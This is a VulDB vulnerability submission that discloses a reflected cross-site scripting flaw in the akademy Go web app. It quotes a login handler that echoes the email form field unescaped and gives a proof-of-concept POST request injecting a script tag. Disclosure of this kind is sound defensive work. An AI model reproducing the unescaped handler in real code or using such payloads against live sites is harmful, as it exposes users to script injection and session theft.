제출 #397340: alwindoss akademy None Cross-site Scripting (XSS)정보

제목	alwindoss akademy None Cross-site Scripting (XSS)
설명	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go Flaw reason: in the CMD file/akademy/handler/handlers. Go line 40, output code directly provided by the user email address (obtained from the form values), without any form of filtering or escaped. This can result in Reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed on the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more. Vulnerability POC: Suppose a malicious user enters an email address with a <script> tag, such as <script>alert('XSS'); </script>. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability. cmd/akademy/handler/handlers.go： ```Go // HandleLogin implements PageHandler. func (h pageHandler) HandleLogin(w http.ResponseWriter, r http.Request) { fmt.Println("Handle Login") r.ParseForm() email := r.FormValue("emailAddress") fmt.Println("Email", email) w.Write([]byte(email)) } ``` POC： ``` POST /login HTTP/1.1 Host: 192.168.1.7:8080 Content-Length: 148 Cache-Control: max-age=0 Origin: http://192.168.1.7:8080 DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.7:8080/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5 Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas= Connection: keep-alive csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script> ``` ![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
원천	⚠️ https://github.com/alwindoss/akademy/issues/1
사용자	zihe (UID 56943)
제출	2024. 08. 24. AM 10:42 (2 연령 ago)
모더레이션	2024. 09. 04. AM 08:58 (11 days later)
상태	수락
VulDB 항목	276487 [alwindoss akademy 까지 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress 크로스 사이트 스크립팅]
포인트들	20

◂ 이전 개요 다음 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!